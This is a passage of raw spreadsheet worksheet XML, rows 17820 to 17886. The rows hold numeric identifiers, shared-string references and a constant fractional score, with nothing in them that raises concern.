      <c r="A17820" s="1">
        <v>366.0</v>
      </c>
      <c r="B17820" s="2">
        <v>1.6274451E7</v>
      </c>
      <c r="C17820" s="2" t="s">
        <v>17183</v>
      </c>
      <c r="D17820" s="2">
        <v>1.0</v>
      </c>
      <c r="E17820" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17820" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17821" ht="15.75" customHeight="1">
      <c r="A17821" s="1">
        <v>367.0</v>
      </c>
      <c r="B17821" s="2">
        <v>1.6274451E7</v>
      </c>
      <c r="C17821" s="2" t="s">
        <v>17184</v>
      </c>
      <c r="D17821" s="2">
        <v>1.0</v>
      </c>
      <c r="E17821" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17821" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17822" ht="15.75" customHeight="1">
      <c r="A17822" s="1">
        <v>369.0</v>
      </c>
      <c r="B17822" s="2">
        <v>1.6274451E7</v>
      </c>
      <c r="C17822" s="2" t="s">
        <v>17185</v>
      </c>
      <c r="D17822" s="2">
        <v>1.0</v>
      </c>
      <c r="E17822" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17822" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17823" ht="15.75" customHeight="1">
      <c r="A17823" s="1">
        <v>788.0</v>
      </c>
      <c r="B17823" s="2">
        <v>2.1211899E7</v>
      </c>
      <c r="C17823" s="2" t="s">
        <v>17186</v>
      </c>
      <c r="D17823" s="2">
        <v>1.0</v>
      </c>
      <c r="E17823" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17823" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17824" ht="15.75" customHeight="1">
      <c r="A17824" s="1">
        <v>1334.0</v>
      </c>
      <c r="B17824" s="2">
        <v>2.5831884E7</v>
      </c>
      <c r="C17824" s="2" t="s">
        <v>17187</v>
      </c>
      <c r="D17824" s="2">
        <v>1.0</v>
      </c>
      <c r="E17824" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17824" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17825" ht="15.75" customHeight="1">
      <c r="A17825" s="1">
        <v>1429.0</v>
      </c>
      <c r="B17825" s="2">
        <v>2.6608276E7</v>
      </c>
      <c r="C17825" s="2" t="s">
        <v>17188</v>
      </c>
      <c r="D17825" s="2">
        <v>1.0</v>
      </c>
      <c r="E17825" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17825" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17826" ht="15.75" customHeight="1">
      <c r="A17826" s="1">
        <v>1562.0</v>
      </c>
      <c r="B17826" s="2">
        <v>2.7652105E7</v>
      </c>
      <c r="C17826" s="2" t="s">
        <v>17189</v>
      </c>
      <c r="D17826" s="2">
        <v>1.0</v>
      </c>
      <c r="E17826" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17826" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17827" ht="15.75" customHeight="1">
      <c r="A17827" s="1">
        <v>1587.0</v>
      </c>
      <c r="B17827" s="2">
        <v>2.7736273E7</v>
      </c>
      <c r="C17827" s="2" t="s">
        <v>17190</v>
      </c>
      <c r="D17827" s="2">
        <v>1.0</v>
      </c>
      <c r="E17827" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17827" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17828" ht="15.75" customHeight="1">
      <c r="A17828" s="1">
        <v>2173.0</v>
      </c>
      <c r="B17828" s="2">
        <v>3.17669E7</v>
      </c>
      <c r="C17828" s="2" t="s">
        <v>17191</v>
      </c>
      <c r="D17828" s="2">
        <v>1.0</v>
      </c>
      <c r="E17828" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17828" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17829" ht="15.75" customHeight="1">
      <c r="A17829" s="1">
        <v>2693.0</v>
      </c>
      <c r="B17829" s="2">
        <v>3.4826388E7</v>
      </c>
      <c r="C17829" s="2" t="s">
        <v>17192</v>
      </c>
      <c r="D17829" s="2">
        <v>1.0</v>
      </c>
      <c r="E17829" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17829" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17830" ht="15.75" customHeight="1">
      <c r="A17830" s="1">
        <v>3052.0</v>
      </c>
      <c r="B17830" s="2">
        <v>3.6506077E7</v>
      </c>
      <c r="C17830" s="2" t="s">
        <v>17193</v>
      </c>
      <c r="D17830" s="2">
        <v>1.0</v>
      </c>
      <c r="E17830" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17830" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17831" ht="15.75" customHeight="1">
      <c r="A17831" s="1">
        <v>3520.0</v>
      </c>
      <c r="B17831" s="2">
        <v>3.8600878E7</v>
      </c>
      <c r="C17831" s="2" t="s">
        <v>17194</v>
      </c>
      <c r="D17831" s="2">
        <v>1.0</v>
      </c>
      <c r="E17831" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17831" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17832" ht="15.75" customHeight="1">
      <c r="A17832" s="1">
        <v>5023.0</v>
      </c>
      <c r="B17832" s="2">
        <v>4.4229649E7</v>
      </c>
      <c r="C17832" s="2" t="s">
        <v>17195</v>
      </c>
      <c r="D17832" s="2">
        <v>1.0</v>
      </c>
      <c r="E17832" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17832" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17833" ht="15.75" customHeight="1">
      <c r="A17833" s="1">
        <v>7095.0</v>
      </c>
      <c r="B17833" s="2">
        <v>5.0312227E7</v>
      </c>
      <c r="C17833" s="2" t="s">
        <v>17196</v>
      </c>
      <c r="D17833" s="2">
        <v>1.0</v>
      </c>
      <c r="E17833" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17833" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17834" ht="15.75" customHeight="1">
      <c r="A17834" s="1">
        <v>7829.0</v>
      </c>
      <c r="B17834" s="2">
        <v>5.2312676E7</v>
      </c>
      <c r="C17834" s="2" t="s">
        <v>17197</v>
      </c>
      <c r="D17834" s="2">
        <v>1.0</v>
      </c>
      <c r="E17834" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17834" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17835" ht="15.75" customHeight="1">
      <c r="A17835" s="1">
        <v>7985.0</v>
      </c>
      <c r="B17835" s="2">
        <v>5.2740945E7</v>
      </c>
      <c r="C17835" s="2" t="s">
        <v>17198</v>
      </c>
      <c r="D17835" s="2">
        <v>1.0</v>
      </c>
      <c r="E17835" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17835" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17836" ht="15.75" customHeight="1">
      <c r="A17836" s="1">
        <v>8982.0</v>
      </c>
      <c r="B17836" s="2">
        <v>5.496181E7</v>
      </c>
      <c r="C17836" s="2" t="s">
        <v>17199</v>
      </c>
      <c r="D17836" s="2">
        <v>1.0</v>
      </c>
      <c r="E17836" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17836" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17837" ht="15.75" customHeight="1">
      <c r="A17837" s="1">
        <v>9015.0</v>
      </c>
      <c r="B17837" s="2">
        <v>5.4990084E7</v>
      </c>
      <c r="C17837" s="2" t="s">
        <v>17200</v>
      </c>
      <c r="D17837" s="2">
        <v>1.0</v>
      </c>
      <c r="E17837" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17837" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17838" ht="15.75" customHeight="1">
      <c r="A17838" s="1">
        <v>9649.0</v>
      </c>
      <c r="B17838" s="2">
        <v>5.6265801E7</v>
      </c>
      <c r="C17838" s="2" t="s">
        <v>17201</v>
      </c>
      <c r="D17838" s="2">
        <v>1.0</v>
      </c>
      <c r="E17838" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17838" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17839" ht="15.75" customHeight="1">
      <c r="A17839" s="1">
        <v>9797.0</v>
      </c>
      <c r="B17839" s="2">
        <v>5.653646E7</v>
      </c>
      <c r="C17839" s="2" t="s">
        <v>17202</v>
      </c>
      <c r="D17839" s="2">
        <v>1.0</v>
      </c>
      <c r="E17839" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17839" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17840" ht="15.75" customHeight="1">
      <c r="A17840" s="1">
        <v>10092.0</v>
      </c>
      <c r="B17840" s="2">
        <v>5.7187876E7</v>
      </c>
      <c r="C17840" s="2" t="s">
        <v>17203</v>
      </c>
      <c r="D17840" s="2">
        <v>1.0</v>
      </c>
      <c r="E17840" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17840" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17841" ht="15.75" customHeight="1">
      <c r="A17841" s="1">
        <v>10671.0</v>
      </c>
      <c r="B17841" s="2">
        <v>1.4516212E7</v>
      </c>
      <c r="C17841" s="2" t="s">
        <v>17204</v>
      </c>
      <c r="D17841" s="2">
        <v>1.0</v>
      </c>
      <c r="E17841" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17841" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17842" ht="15.75" customHeight="1">
      <c r="A17842" s="1">
        <v>10900.0</v>
      </c>
      <c r="B17842" s="2">
        <v>1.6630535E7</v>
      </c>
      <c r="C17842" s="2" t="s">
        <v>17205</v>
      </c>
      <c r="D17842" s="2">
        <v>1.0</v>
      </c>
      <c r="E17842" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17842" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17843" ht="15.75" customHeight="1">
      <c r="A17843" s="1">
        <v>11210.0</v>
      </c>
      <c r="B17843" s="2">
        <v>2.0086333E7</v>
      </c>
      <c r="C17843" s="2" t="s">
        <v>17206</v>
      </c>
      <c r="D17843" s="2">
        <v>1.0</v>
      </c>
      <c r="E17843" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17843" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17844" ht="15.75" customHeight="1">
      <c r="A17844" s="1">
        <v>11212.0</v>
      </c>
      <c r="B17844" s="2">
        <v>2010527.0</v>
      </c>
      <c r="C17844" s="2" t="s">
        <v>17207</v>
      </c>
      <c r="D17844" s="2">
        <v>1.0</v>
      </c>
      <c r="E17844" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17844" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17845" ht="15.75" customHeight="1">
      <c r="A17845" s="1">
        <v>11234.0</v>
      </c>
      <c r="B17845" s="2">
        <v>2.03482E7</v>
      </c>
      <c r="C17845" s="2" t="s">
        <v>17208</v>
      </c>
      <c r="D17845" s="2">
        <v>1.0</v>
      </c>
      <c r="E17845" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17845" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17846" ht="15.75" customHeight="1">
      <c r="A17846" s="1">
        <v>12474.0</v>
      </c>
      <c r="B17846" s="2">
        <v>2.944828E7</v>
      </c>
      <c r="C17846" s="2" t="s">
        <v>17209</v>
      </c>
      <c r="D17846" s="2">
        <v>1.0</v>
      </c>
      <c r="E17846" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17846" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17847" ht="15.75" customHeight="1">
      <c r="A17847" s="1">
        <v>12713.0</v>
      </c>
      <c r="B17847" s="2">
        <v>3.0842613E7</v>
      </c>
      <c r="C17847" s="2" t="s">
        <v>17210</v>
      </c>
      <c r="D17847" s="2">
        <v>1.0</v>
      </c>
      <c r="E17847" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17847" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17848" ht="15.75" customHeight="1">
      <c r="A17848" s="1">
        <v>12944.0</v>
      </c>
      <c r="B17848" s="2">
        <v>3.2375855E7</v>
      </c>
      <c r="C17848" s="2" t="s">
        <v>17211</v>
      </c>
      <c r="D17848" s="2">
        <v>1.0</v>
      </c>
      <c r="E17848" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17848" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17849" ht="15.75" customHeight="1">
      <c r="A17849" s="1">
        <v>13575.0</v>
      </c>
      <c r="B17849" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C17849" s="2" t="s">
        <v>17212</v>
      </c>
      <c r="D17849" s="2">
        <v>1.0</v>
      </c>
      <c r="E17849" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17849" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17850" ht="15.75" customHeight="1">
      <c r="A17850" s="1">
        <v>14081.0</v>
      </c>
      <c r="B17850" s="2">
        <v>3.7683691E7</v>
      </c>
      <c r="C17850" s="2" t="s">
        <v>17213</v>
      </c>
      <c r="D17850" s="2">
        <v>1.0</v>
      </c>
      <c r="E17850" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17850" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17851" ht="15.75" customHeight="1">
      <c r="A17851" s="1">
        <v>14204.0</v>
      </c>
      <c r="B17851" s="2">
        <v>3.8239723E7</v>
      </c>
      <c r="C17851" s="2" t="s">
        <v>17214</v>
      </c>
      <c r="D17851" s="2">
        <v>1.0</v>
      </c>
      <c r="E17851" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17851" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17852" ht="15.75" customHeight="1">
      <c r="A17852" s="1">
        <v>14230.0</v>
      </c>
      <c r="B17852" s="2">
        <v>3.8300168E7</v>
      </c>
      <c r="C17852" s="2" t="s">
        <v>17215</v>
      </c>
      <c r="D17852" s="2">
        <v>1.0</v>
      </c>
      <c r="E17852" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17852" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17853" ht="15.75" customHeight="1">
      <c r="A17853" s="1">
        <v>14380.0</v>
      </c>
      <c r="B17853" s="2">
        <v>3.9009218E7</v>
      </c>
      <c r="C17853" s="2" t="s">
        <v>17216</v>
      </c>
      <c r="D17853" s="2">
        <v>1.0</v>
      </c>
      <c r="E17853" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17853" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17854" ht="15.75" customHeight="1">
      <c r="A17854" s="1">
        <v>14605.0</v>
      </c>
      <c r="B17854" s="2">
        <v>4.0240314E7</v>
      </c>
      <c r="C17854" s="2" t="s">
        <v>17217</v>
      </c>
      <c r="D17854" s="2">
        <v>1.0</v>
      </c>
      <c r="E17854" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17854" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17855" ht="15.75" customHeight="1">
      <c r="A17855" s="1">
        <v>14841.0</v>
      </c>
      <c r="B17855" s="2">
        <v>4.1036244E7</v>
      </c>
      <c r="C17855" s="2" t="s">
        <v>17218</v>
      </c>
      <c r="D17855" s="2">
        <v>1.0</v>
      </c>
      <c r="E17855" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17855" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17856" ht="15.75" customHeight="1">
      <c r="A17856" s="1">
        <v>14900.0</v>
      </c>
      <c r="B17856" s="2">
        <v>4.1152914E7</v>
      </c>
      <c r="C17856" s="2" t="s">
        <v>17219</v>
      </c>
      <c r="D17856" s="2">
        <v>1.0</v>
      </c>
      <c r="E17856" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17856" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17857" ht="15.75" customHeight="1">
      <c r="A17857" s="1">
        <v>15208.0</v>
      </c>
      <c r="B17857" s="2">
        <v>4.213161E7</v>
      </c>
      <c r="C17857" s="2" t="s">
        <v>17220</v>
      </c>
      <c r="D17857" s="2">
        <v>1.0</v>
      </c>
      <c r="E17857" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17857" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17858" ht="15.75" customHeight="1">
      <c r="A17858" s="1">
        <v>15222.0</v>
      </c>
      <c r="B17858" s="2">
        <v>4.2163472E7</v>
      </c>
      <c r="C17858" s="2" t="s">
        <v>17221</v>
      </c>
      <c r="D17858" s="2">
        <v>1.0</v>
      </c>
      <c r="E17858" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17858" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17859" ht="15.75" customHeight="1">
      <c r="A17859" s="1">
        <v>15639.0</v>
      </c>
      <c r="B17859" s="2">
        <v>4.3586278E7</v>
      </c>
      <c r="C17859" s="2" t="s">
        <v>17222</v>
      </c>
      <c r="D17859" s="2">
        <v>1.0</v>
      </c>
      <c r="E17859" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17859" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17860" ht="15.75" customHeight="1">
      <c r="A17860" s="1">
        <v>15672.0</v>
      </c>
      <c r="B17860" s="2">
        <v>4.378185E7</v>
      </c>
      <c r="C17860" s="2" t="s">
        <v>17223</v>
      </c>
      <c r="D17860" s="2">
        <v>1.0</v>
      </c>
      <c r="E17860" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17860" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17861" ht="15.75" customHeight="1">
      <c r="A17861" s="1">
        <v>15797.0</v>
      </c>
      <c r="B17861" s="2">
        <v>4.4211439E7</v>
      </c>
      <c r="C17861" s="2" t="s">
        <v>17224</v>
      </c>
      <c r="D17861" s="2">
        <v>1.0</v>
      </c>
      <c r="E17861" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17861" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17862" ht="15.75" customHeight="1">
      <c r="A17862" s="1">
        <v>15830.0</v>
      </c>
      <c r="B17862" s="2">
        <v>4.431159E7</v>
      </c>
      <c r="C17862" s="2" t="s">
        <v>17225</v>
      </c>
      <c r="D17862" s="2">
        <v>1.0</v>
      </c>
      <c r="E17862" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17862" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17863" ht="15.75" customHeight="1">
      <c r="A17863" s="1">
        <v>15938.0</v>
      </c>
      <c r="B17863" s="2">
        <v>4.4729739E7</v>
      </c>
      <c r="C17863" s="2" t="s">
        <v>17226</v>
      </c>
      <c r="D17863" s="2">
        <v>1.0</v>
      </c>
      <c r="E17863" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17863" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17864" ht="15.75" customHeight="1">
      <c r="A17864" s="1">
        <v>16256.0</v>
      </c>
      <c r="B17864" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C17864" s="2" t="s">
        <v>17227</v>
      </c>
      <c r="D17864" s="2">
        <v>1.0</v>
      </c>
      <c r="E17864" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17864" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17865" ht="15.75" customHeight="1">
      <c r="A17865" s="1">
        <v>16591.0</v>
      </c>
      <c r="B17865" s="2">
        <v>4.6978716E7</v>
      </c>
      <c r="C17865" s="2" t="s">
        <v>17228</v>
      </c>
      <c r="D17865" s="2">
        <v>1.0</v>
      </c>
      <c r="E17865" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17865" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17866" ht="15.75" customHeight="1">
      <c r="A17866" s="1">
        <v>17178.0</v>
      </c>
      <c r="B17866" s="2">
        <v>4.8905224E7</v>
      </c>
      <c r="C17866" s="2" t="s">
        <v>17229</v>
      </c>
      <c r="D17866" s="2">
        <v>1.0</v>
      </c>
      <c r="E17866" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17866" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17867" ht="15.75" customHeight="1">
      <c r="A17867" s="1">
        <v>17369.0</v>
      </c>
      <c r="B17867" s="2">
        <v>4.9501234E7</v>
      </c>
      <c r="C17867" s="2" t="s">
        <v>17230</v>
      </c>
      <c r="D17867" s="2">
        <v>1.0</v>
      </c>
      <c r="E17867" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17867" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17868" ht="15.75" customHeight="1">
      <c r="A17868" s="1">
        <v>18257.0</v>
      </c>
      <c r="B17868" s="2">
        <v>5.2180824E7</v>
      </c>
      <c r="C17868" s="2" t="s">
        <v>17231</v>
      </c>
      <c r="D17868" s="2">
        <v>1.0</v>
      </c>
      <c r="E17868" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17868" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17869" ht="15.75" customHeight="1">
      <c r="A17869" s="1">
        <v>19008.0</v>
      </c>
      <c r="B17869" s="2">
        <v>5.4498798E7</v>
      </c>
      <c r="C17869" s="2" t="s">
        <v>17232</v>
      </c>
      <c r="D17869" s="2">
        <v>1.0</v>
      </c>
      <c r="E17869" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17869" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17870" ht="15.75" customHeight="1">
      <c r="A17870" s="1">
        <v>19054.0</v>
      </c>
      <c r="B17870" s="2">
        <v>5.4578424E7</v>
      </c>
      <c r="C17870" s="2" t="s">
        <v>17233</v>
      </c>
      <c r="D17870" s="2">
        <v>1.0</v>
      </c>
      <c r="E17870" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17870" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17871" ht="15.75" customHeight="1">
      <c r="A17871" s="1">
        <v>19109.0</v>
      </c>
      <c r="B17871" s="2">
        <v>5.4734661E7</v>
      </c>
      <c r="C17871" s="2" t="s">
        <v>17234</v>
      </c>
      <c r="D17871" s="2">
        <v>1.0</v>
      </c>
      <c r="E17871" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17871" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17872" ht="15.75" customHeight="1">
      <c r="A17872" s="1">
        <v>19609.0</v>
      </c>
      <c r="B17872" s="2">
        <v>5.6185691E7</v>
      </c>
      <c r="C17872" s="2" t="s">
        <v>17235</v>
      </c>
      <c r="D17872" s="2">
        <v>1.0</v>
      </c>
      <c r="E17872" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17872" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17873" ht="15.75" customHeight="1">
      <c r="A17873" s="1">
        <v>20180.0</v>
      </c>
      <c r="B17873" s="2">
        <v>1.0464875E7</v>
      </c>
      <c r="C17873" s="2" t="s">
        <v>17236</v>
      </c>
      <c r="D17873" s="2">
        <v>1.0</v>
      </c>
      <c r="E17873" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17873" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17874" ht="15.75" customHeight="1">
      <c r="A17874" s="1">
        <v>20213.0</v>
      </c>
      <c r="B17874" s="2">
        <v>1.07177E7</v>
      </c>
      <c r="C17874" s="2" t="s">
        <v>17237</v>
      </c>
      <c r="D17874" s="2">
        <v>1.0</v>
      </c>
      <c r="E17874" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17874" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17875" ht="15.75" customHeight="1">
      <c r="A17875" s="1">
        <v>20327.0</v>
      </c>
      <c r="B17875" s="2">
        <v>1.150157E7</v>
      </c>
      <c r="C17875" s="2" t="s">
        <v>17238</v>
      </c>
      <c r="D17875" s="2">
        <v>1.0</v>
      </c>
      <c r="E17875" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17875" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17876" ht="15.75" customHeight="1">
      <c r="A17876" s="1">
        <v>20441.0</v>
      </c>
      <c r="B17876" s="2">
        <v>1.2417162E7</v>
      </c>
      <c r="C17876" s="2" t="s">
        <v>17239</v>
      </c>
      <c r="D17876" s="2">
        <v>1.0</v>
      </c>
      <c r="E17876" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17876" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17877" ht="15.75" customHeight="1">
      <c r="A17877" s="1">
        <v>20442.0</v>
      </c>
      <c r="B17877" s="2">
        <v>1.2417165E7</v>
      </c>
      <c r="C17877" s="2" t="s">
        <v>17239</v>
      </c>
      <c r="D17877" s="2">
        <v>1.0</v>
      </c>
      <c r="E17877" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17877" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17878" ht="15.75" customHeight="1">
      <c r="A17878" s="1">
        <v>20518.0</v>
      </c>
      <c r="B17878" s="2">
        <v>1.3078249E7</v>
      </c>
      <c r="C17878" s="2" t="s">
        <v>17240</v>
      </c>
      <c r="D17878" s="2">
        <v>1.0</v>
      </c>
      <c r="E17878" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17878" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17879" ht="15.75" customHeight="1">
      <c r="A17879" s="1">
        <v>20535.0</v>
      </c>
      <c r="B17879" s="2">
        <v>1.3228294E7</v>
      </c>
      <c r="C17879" s="2" t="s">
        <v>17241</v>
      </c>
      <c r="D17879" s="2">
        <v>1.0</v>
      </c>
      <c r="E17879" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17879" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17880" ht="15.75" customHeight="1">
      <c r="A17880" s="1">
        <v>20569.0</v>
      </c>
      <c r="B17880" s="2">
        <v>1.3553042E7</v>
      </c>
      <c r="C17880" s="2" t="s">
        <v>17242</v>
      </c>
      <c r="D17880" s="2">
        <v>1.0</v>
      </c>
      <c r="E17880" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17880" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17881" ht="15.75" customHeight="1">
      <c r="A17881" s="1">
        <v>20918.0</v>
      </c>
      <c r="B17881" s="2">
        <v>1.6374935E7</v>
      </c>
      <c r="C17881" s="2" t="s">
        <v>17243</v>
      </c>
      <c r="D17881" s="2">
        <v>1.0</v>
      </c>
      <c r="E17881" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17881" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17882" ht="15.75" customHeight="1">
      <c r="A17882" s="1">
        <v>21308.0</v>
      </c>
      <c r="B17882" s="2">
        <v>2.0769134E7</v>
      </c>
      <c r="C17882" s="2" t="s">
        <v>17244</v>
      </c>
      <c r="D17882" s="2">
        <v>1.0</v>
      </c>
      <c r="E17882" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17882" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17883" ht="15.75" customHeight="1">
      <c r="A17883" s="1">
        <v>21373.0</v>
      </c>
      <c r="B17883" s="2">
        <v>2.1575166E7</v>
      </c>
      <c r="C17883" s="2" t="s">
        <v>17245</v>
      </c>
      <c r="D17883" s="2">
        <v>1.0</v>
      </c>
      <c r="E17883" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17883" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17884" ht="15.75" customHeight="1">
      <c r="A17884" s="1">
        <v>21507.0</v>
      </c>
      <c r="B17884" s="2">
        <v>2.3137594E7</v>
      </c>
      <c r="C17884" s="2" t="s">
        <v>17246</v>
      </c>
      <c r="D17884" s="2">
        <v>1.0</v>
      </c>
      <c r="E17884" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17884" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17885" ht="15.75" customHeight="1">
      <c r="A17885" s="1">
        <v>21531.0</v>
      </c>
      <c r="B17885" s="2">
        <v>2.342901E7</v>
      </c>
      <c r="C17885" s="2" t="s">
        <v>17247</v>
      </c>
      <c r="D17885" s="2">
        <v>1.0</v>
      </c>
      <c r="E17885" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17885" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17886" ht="15.75" customHeight="1">
      <c r="A17886" s="1">
        <v>21744.0</v>
      </c>
      <c r="B17886" s="2">
        <v>2.5923904E7</v>
      </c>
      <c r="C17886" s="2" t="s">
        <v>17248</v>
      </c>
      <c r="D17886" s="2">
        <v>1.0</v>
      </c>
      <c r="E17886" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17886" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17887" ht="15.75" customHeight="1">
